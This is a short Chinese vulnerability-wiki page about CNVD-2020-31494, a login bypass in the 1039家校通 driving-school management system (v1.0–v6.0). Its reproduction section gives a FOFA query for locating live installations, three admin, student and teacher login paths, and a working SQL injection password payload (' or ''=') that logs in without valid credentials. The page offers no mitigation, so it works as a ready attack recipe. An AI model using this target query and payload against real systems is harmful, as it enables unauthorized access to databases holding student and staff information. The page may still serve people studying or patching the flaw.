menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 1039家校通 chevron_right 1039家校通 万能密码绕过 CNVD-2020-31494.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    1039家校通 万能密码绕过 CNVD-2020-31494.md
    823 B / 2021-04-15 12:15:19
        # 1039家校通 万能密码绕过 CNVD-2020-31494
    
    ## 漏洞描述
    
    北京1039科技发展有限公司是一家专注驾校管理系统、驾校移动办公系统、驾校管理软件、驾校招生小程序开发等,为驾校提供无死角的驾校管理系统解决方案。
    
    北京1039科技发展有限公司驾校管理系统存在万能密码绕过漏洞,攻击者可利用该漏洞获取数据库信息。
    
    ## 漏洞影响
    
    > [!NOTE]
    >
    > 1039家校通 v1.0 - v6.0
    
    ## FOFA
    
    > [!NOTE]
    >
    > title="学员登录_1039家校通"
    
    ## 漏洞复现
    
    管理员登录接口为
    
    ```
    /admin/Product/Comstye.aspx
    /Student/StudentLogin.aspx
    /Teacher/Index.aspx
    ```
    
    ![](image/1039-2.png)
    
    账号密码为如下即可登录
    
    ```
    user:peiqi
    pass:' or ''='
    ```
    
    ![](image/1039-1.png)
    
    
    
    
    
    links
    file_download